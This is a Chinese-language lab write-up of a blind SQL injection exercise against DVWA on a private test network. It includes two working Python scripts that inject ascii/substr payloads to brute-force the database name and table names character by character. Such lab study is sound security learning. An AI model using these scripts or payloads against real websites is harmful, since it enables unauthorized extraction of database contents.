目的
理解SQL盲注的原理、方法、过程。利用不同数据库特有的函数进行探测,从而获取信息。
环境
系统:Kali Linux 2019(IP:10.10.10.128)
平台:OWASPBWA v0.94中的DVWA(IP:10.10.10.131)
界面
操作
现在想利用substr函数对数据库名进行猜解,将字符转化为ACSII值逐位比较。
语法
substr(strings,offset,length)
- strings:必选项,数据库中截取的字段
- offset:必选项,对strings的开始位置
- length:必选,要截取的长度
Python代码
探查数据库名
import requests
import re
header={
"Host":"10.10.10.131",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Cookie":"security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Cache-Control":"max-age=0"
}
def getDBName():
DBName = ""
url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),{0},1))={1} %23&Submit=Submit"
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
print("Start to retrieve database name...")
for i in range(1,5):
for char in chars:
char_ascii=ord(char)
url = url_template.format(i,char_ascii)
response = requests.session().get(url,headers=header)
pattern = re.compile(r'Surname:')
match = pattern.search(response.text)
if match:
DBName += char
break
print("Retrieve complated\nDBName is: " + DBName)
getDBName()
导入正则表达式和url请求相关的模块,由于注入的前提需要登陆,所以需要设置好URL的headers,response也应该是一个会话(session()),开始在网上查找时大多是requests.get(url),所以自己操作还是需要根据自己的实际来做适当的改动。尤其是URL在设置时要保证不能缺少相关字段,我在开始时就忘了“&Submit=Submit”字段,导致一直没有结果。
探查表名
import requests
import re
header={
"Host":"10.10.10.131",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Cookie":"security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Cache-Control":"max-age=0"
}
def getTableName():
#DBName = ""
url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))={2} %23&Submit=Submit#"
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
print("Start to retrieve table name...")
print("-------------------------------")
for i in range(0,2): # number of tables
TableName = ""
for j in range(1,10): # length of table_name
for char in chars:
char_ascii=ord(char)
url = url_template.format(i,j,char_ascii)
response = requests.session().get(url,headers=header)
pattern = re.compile(r'Surname:')
match = pattern.search(response.text)
if match:
TableName += char
break
if len(TableName) == 0:
print("Can' Find")
else:
print(TableName)
print("-------------------------------")
print("Finish retrieving!")
getTableName()
总结
整体过程比较简单,但是实际操作中还不是那么顺利,总需要多实践。
多做笔记,自我激励!
Reference
https://blog.csdn.net/sophia9301/article/details/78215264
https://blog.csdn.net/MAILLIBIN/article/details/84592940